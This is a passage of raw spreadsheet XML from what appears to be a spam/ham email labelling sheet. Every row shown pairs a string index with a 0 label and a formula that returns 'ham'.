        <v>1659</v>
      </c>
      <c r="B2183">
        <v>0</v>
      </c>
      <c r="C2183" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2184" t="s">
        <v>1660</v>
      </c>
      <c r="B2184">
        <v>0</v>
      </c>
      <c r="C2184" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2185" t="s">
        <v>1661</v>
      </c>
      <c r="B2185">
        <v>0</v>
      </c>
      <c r="C2185" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2186" t="s">
        <v>1662</v>
      </c>
      <c r="B2186">
        <v>0</v>
      </c>
      <c r="C2186" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2187" t="s">
        <v>1663</v>
      </c>
      <c r="B2187">
        <v>0</v>
      </c>
      <c r="C2187" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2188" t="s">
        <v>1664</v>
      </c>
      <c r="B2188">
        <v>0</v>
      </c>
      <c r="C2188" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2189" t="s">
        <v>1665</v>
      </c>
      <c r="B2189">
        <v>0</v>
      </c>
      <c r="C2189" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2190" t="s">
        <v>1666</v>
      </c>
      <c r="B2190">
        <v>0</v>
      </c>
      <c r="C2190" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2191" t="s">
        <v>1667</v>
      </c>
      <c r="B2191">
        <v>0</v>
      </c>
      <c r="C2191" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2192" t="s">
        <v>1668</v>
      </c>
      <c r="B2192">
        <v>0</v>
      </c>
      <c r="C2192" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2193" t="s">
        <v>1669</v>
      </c>
      <c r="B2193">
        <v>0</v>
      </c>
      <c r="C2193" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2194" t="s">
        <v>1670</v>
      </c>
      <c r="B2194">
        <v>0</v>
      </c>
      <c r="C2194" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2195" t="s">
        <v>1671</v>
      </c>
      <c r="B2195">
        <v>0</v>
      </c>
      <c r="C2195" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2196" t="s">
        <v>1672</v>
      </c>
      <c r="B2196">
        <v>0</v>
      </c>
      <c r="C2196" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2197" t="s">
        <v>1673</v>
      </c>
      <c r="B2197">
        <v>0</v>
      </c>
      <c r="C2197" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2198" t="s">
        <v>1674</v>
      </c>
      <c r="B2198">
        <v>0</v>
      </c>
      <c r="C2198" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2199" t="s">
        <v>1675</v>
      </c>
      <c r="B2199">
        <v>0</v>
      </c>
      <c r="C2199" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2200" t="s">
        <v>1676</v>
      </c>
      <c r="B2200">
        <v>0</v>
      </c>
      <c r="C2200" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2201" t="s">
        <v>1677</v>
      </c>
      <c r="B2201">
        <v>0</v>
      </c>
      <c r="C2201" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2202" t="s">
        <v>1678</v>
      </c>
      <c r="B2202">
        <v>0</v>
      </c>
      <c r="C2202" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2203" t="s">
        <v>1679</v>
      </c>
      <c r="B2203">
        <v>0</v>
      </c>
      <c r="C2203" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2204" t="s">
        <v>1680</v>
      </c>
      <c r="B2204">
        <v>0</v>
      </c>
      <c r="C2204" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2205" t="s">
        <v>1681</v>
      </c>
      <c r="B2205">
        <v>0</v>
      </c>
      <c r="C2205" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2206" t="s">
        <v>1682</v>
      </c>
      <c r="B2206">
        <v>0</v>
      </c>
      <c r="C2206" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2207" t="s">
        <v>1683</v>
      </c>
      <c r="B2207">
        <v>0</v>
      </c>
      <c r="C2207" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2208" t="s">
        <v>1684</v>
      </c>
      <c r="B2208">
        <v>0</v>
      </c>
      <c r="C2208" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2209" t="s">
        <v>1685</v>
      </c>
      <c r="B2209">
        <v>0</v>
      </c>
      <c r="C2209" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2210" t="s">
        <v>1686</v>
      </c>
      <c r="B2210">
        <v>0</v>
      </c>
      <c r="C2210" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2211" t="s">
        <v>1687</v>
      </c>
      <c r="B2211">
        <v>0</v>
      </c>
      <c r="C2211" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2212" t="s">
        <v>1688</v>
      </c>
      <c r="B2212">
        <v>0</v>
      </c>
      <c r="C2212" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2213" t="s">
        <v>1689</v>
      </c>
      <c r="B2213">
        <v>0</v>
      </c>
      <c r="C2213" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2214" t="s">
        <v>1690</v>
      </c>
      <c r="B2214">
        <v>0</v>
      </c>
      <c r="C2214" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2215" t="s">
        <v>1690</v>
      </c>
      <c r="B2215">
        <v>0</v>
      </c>
      <c r="C2215" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2216" t="s">
        <v>1690</v>
      </c>
      <c r="B2216">
        <v>0</v>
      </c>
      <c r="C2216" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2217" t="s">
        <v>1691</v>
      </c>
      <c r="B2217">
        <v>0</v>
      </c>
      <c r="C2217" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2218" t="s">
        <v>1692</v>
      </c>
      <c r="B2218">
        <v>0</v>
      </c>
      <c r="C2218" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2219" t="s">
        <v>1693</v>
      </c>
      <c r="B2219">
        <v>0</v>
      </c>
      <c r="C2219" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2220" t="s">
        <v>1694</v>
      </c>
      <c r="B2220">
        <v>0</v>
      </c>
      <c r="C2220" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2221" t="s">
        <v>1695</v>
      </c>
      <c r="B2221">
        <v>0</v>
      </c>
      <c r="C2221" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2222" t="s">
        <v>1696</v>
      </c>
      <c r="B2222">
        <v>0</v>
      </c>
      <c r="C2222" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2223" t="s">
        <v>1697</v>
      </c>
      <c r="B2223">
        <v>0</v>
      </c>
      <c r="C2223" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2224" t="s">
        <v>1698</v>
      </c>
      <c r="B2224">
        <v>0</v>
      </c>
      <c r="C2224" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2225" t="s">
        <v>1699</v>
      </c>
      <c r="B2225">
        <v>0</v>
      </c>
      <c r="C2225" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2226" t="s">
        <v>1700</v>
      </c>
      <c r="B2226">
        <v>0</v>
      </c>
      <c r="C2226" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2227" t="s">
        <v>1701</v>
      </c>
      <c r="B2227">
        <v>0</v>
      </c>
      <c r="C2227" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2228" t="s">
        <v>1702</v>
      </c>
      <c r="B2228">
        <v>0</v>
      </c>
      <c r="C2228" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2229" t="s">
        <v>1703</v>
      </c>
      <c r="B2229">
        <v>0</v>
      </c>
      <c r="C2229" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2230" t="s">
        <v>1704</v>
      </c>
      <c r="B2230">
        <v>0</v>
      </c>
      <c r="C2230" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2231" t="s">
        <v>1705</v>
      </c>
      <c r="B2231">
        <v>0</v>
      </c>
      <c r="C2231" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2232" t="s">
        <v>1706</v>
      </c>
      <c r="B2232">
        <v>0</v>
      </c>
      <c r="C2232" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2233" t="s">
        <v>1707</v>
      </c>
      <c r="B2233">
        <v>0</v>
      </c>
      <c r="C2233" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2234" t="s">
        <v>1708</v>
      </c>
      <c r="B2234">
        <v>0</v>
      </c>
      <c r="C2234" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2235" t="s">
        <v>1709</v>
      </c>
      <c r="B2235">
        <v>0</v>
      </c>
      <c r="C2235" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2236" t="s">
        <v>1710</v>
      </c>
      <c r="B2236">
        <v>0</v>
      </c>
      <c r="C2236" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2237" t="s">
        <v>1711</v>
      </c>
      <c r="B2237">
        <v>0</v>
      </c>
      <c r="C2237" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2238" t="s">
        <v>1712</v>
      </c>
      <c r="B2238">
        <v>0</v>
      </c>
      <c r="C2238" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2239" t="s">
        <v>1713</v>
      </c>
      <c r="B2239">
        <v>0</v>
      </c>
      <c r="C2239" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2240" t="s">
        <v>1714</v>
      </c>
      <c r="B2240">
        <v>0</v>
      </c>
      <c r="C2240" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2241" t="s">
        <v>1715</v>
      </c>
      <c r="B2241">
        <v>0</v>
      </c>
      <c r="C2241" t="str">
        <f t="shared" si="34"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2242" t="s">
        <v>1716</v>
      </c>
      <c r="B2242">
        <v>0</v>
      </c>
      <c r="C2242" t="str">
        <f t="shared" ref="C2242:C2305" si="35">IF(B2242="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2243" t="s">
        <v>1717</v>
      </c>
      <c r="B2243">
        <v>0</v>
      </c>
      <c r="C2243" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2244" t="s">
        <v>1718</v>
      </c>
      <c r="B2244">
        <v>0</v>
      </c>
      <c r="C2244" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2245" t="s">
        <v>1719</v>
      </c>
      <c r="B2245">
        <v>0</v>
      </c>
      <c r="C2245" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2246" t="s">
        <v>1720</v>
      </c>
      <c r="B2246">
        <v>0</v>
      </c>
      <c r="C2246" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2247" t="s">
        <v>1721</v>
      </c>
      <c r="B2247">
        <v>0</v>
      </c>
      <c r="C2247" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2248" t="s">
        <v>1722</v>
      </c>
      <c r="B2248">
        <v>0</v>
      </c>
      <c r="C2248" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2249" t="s">
        <v>1723</v>
      </c>
      <c r="B2249">
        <v>0</v>
      </c>
      <c r="C2249" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2250" t="s">
        <v>1724</v>
      </c>
      <c r="B2250">
        <v>0</v>
      </c>
      <c r="C2250" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2251" t="s">
        <v>1725</v>
      </c>
      <c r="B2251">
        <v>0</v>
      </c>
      <c r="C2251" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2252" t="s">
        <v>1726</v>
      </c>
      <c r="B2252">
        <v>0</v>
      </c>
      <c r="C2252" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2253" t="s">
        <v>1727</v>
      </c>
      <c r="B2253">
        <v>0</v>
      </c>
      <c r="C2253" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2254" t="s">
        <v>1728</v>
      </c>
      <c r="B2254">
        <v>0</v>
      </c>
      <c r="C2254" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2255" t="s">
        <v>1729</v>
      </c>
      <c r="B2255">
        <v>0</v>
      </c>
      <c r="C2255" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2256" t="s">
        <v>1730</v>
      </c>
      <c r="B2256">
        <v>0</v>
      </c>
      <c r="C2256" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2257" t="s">
        <v>1731</v>
      </c>
      <c r="B2257">
        <v>0</v>
      </c>
      <c r="C2257" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2258" t="s">
        <v>1732</v>
      </c>
      <c r="B2258">
        <v>0</v>
      </c>
      <c r="C2258" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2259" t="s">
        <v>1733</v>
      </c>
      <c r="B2259">
        <v>0</v>
      </c>
      <c r="C2259" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2260" t="s">
        <v>1734</v>
      </c>
      <c r="B2260">
        <v>0</v>
      </c>
      <c r="C2260" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2261" t="s">
        <v>1735</v>
      </c>
      <c r="B2261">
        <v>0</v>
      </c>
      <c r="C2261" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2262" t="s">
        <v>1736</v>
      </c>
      <c r="B2262">
        <v>0</v>
      </c>
      <c r="C2262" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2263" t="s">
        <v>1737</v>
      </c>
      <c r="B2263">
        <v>0</v>
      </c>
      <c r="C2263" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2264" t="s">
        <v>1738</v>
      </c>
      <c r="B2264">
        <v>0</v>
      </c>
      <c r="C2264" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2265" t="s">
        <v>21</v>
      </c>
      <c r="B2265">
        <v>0</v>
      </c>
      <c r="C2265" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2266" t="s">
        <v>1739</v>
      </c>
      <c r="B2266">
        <v>0</v>
      </c>
      <c r="C2266" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2267" t="s">
        <v>1740</v>
      </c>
      <c r="B2267">
        <v>0</v>
      </c>
      <c r="C2267" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2268" t="s">
        <v>1741</v>
      </c>
      <c r="B2268">
        <v>0</v>
      </c>
      <c r="C2268" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2269" t="s">
        <v>1742</v>
      </c>
      <c r="B2269">
        <v>0</v>
      </c>
      <c r="C2269" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2270" t="s">
        <v>1743</v>
      </c>
      <c r="B2270">
        <v>0</v>
      </c>
      <c r="C2270" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2271" t="s">
        <v>1744</v>
      </c>
      <c r="B2271">
        <v>0</v>
      </c>
      <c r="C2271" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2272" t="s">
        <v>1745</v>
      </c>
      <c r="B2272">
        <v>0</v>
      </c>
      <c r="C2272" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2273" t="s">
        <v>1746</v>
      </c>
      <c r="B2273">
        <v>0</v>
      </c>
      <c r="C2273" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2274" t="s">
        <v>1747</v>
      </c>
      <c r="B2274">
        <v>0</v>
      </c>
      <c r="C2274" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2275" t="s">
        <v>1748</v>
      </c>
      <c r="B2275">
        <v>0</v>
      </c>
      <c r="C2275" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2276" t="s">
        <v>1749</v>
      </c>
      <c r="B2276">
        <v>0</v>
      </c>
      <c r="C2276" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2277" t="s">
        <v>1750</v>
      </c>
      <c r="B2277">
        <v>0</v>
      </c>
      <c r="C2277" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2278" t="s">
        <v>1751</v>
      </c>
      <c r="B2278">
        <v>0</v>
      </c>
      <c r="C2278" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2279" t="s">
        <v>1752</v>
      </c>
      <c r="B2279">
        <v>0</v>
      </c>
      <c r="C2279" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2280" t="s">
        <v>1753</v>
      </c>
      <c r="B2280">
        <v>0</v>
      </c>
      <c r="C2280" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2281" t="s">
        <v>1754</v>
      </c>
      <c r="B2281">
        <v>0</v>
      </c>
      <c r="C2281" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2282" t="s">
        <v>1755</v>
      </c>
      <c r="B2282">
        <v>0</v>
      </c>
      <c r="C2282" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2283" t="s">
        <v>21</v>
      </c>
      <c r="B2283">
        <v>0</v>
      </c>
      <c r="C2283" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2284" t="s">
        <v>21</v>
      </c>
      <c r="B2284">
        <v>0</v>
      </c>
      <c r="C2284" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2285" t="s">
        <v>21</v>
      </c>
      <c r="B2285">
        <v>0</v>
      </c>
      <c r="C2285" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2286" t="s">
        <v>21</v>
      </c>
      <c r="B2286">
        <v>0</v>
      </c>
      <c r="C2286" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2287" t="s">
        <v>1756</v>
      </c>
      <c r="B2287">
        <v>0</v>
      </c>
      <c r="C2287" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2288" t="s">
        <v>1757</v>
      </c>
      <c r="B2288">
        <v>0</v>
      </c>
      <c r="C2288" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2289" t="s">
        <v>1758</v>
      </c>
      <c r="B2289">
        <v>0</v>
      </c>
      <c r="C2289" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2290" t="s">
        <v>1759</v>
      </c>
      <c r="B2290">
        <v>0</v>
      </c>
      <c r="C2290" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2291" t="s">
        <v>1760</v>
      </c>
      <c r="B2291">
        <v>0</v>
      </c>
      <c r="C2291" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2292" t="s">
        <v>1761</v>
      </c>
      <c r="B2292">
        <v>0</v>
      </c>
      <c r="C2292" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2293" t="s">
        <v>1762</v>
      </c>
      <c r="B2293">
        <v>0</v>
      </c>
      <c r="C2293" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2294" t="s">
        <v>1763</v>
      </c>
      <c r="B2294">
        <v>0</v>
      </c>
      <c r="C2294" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2295" t="s">
        <v>1764</v>
      </c>
      <c r="B2295">
        <v>0</v>
      </c>
      <c r="C2295" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
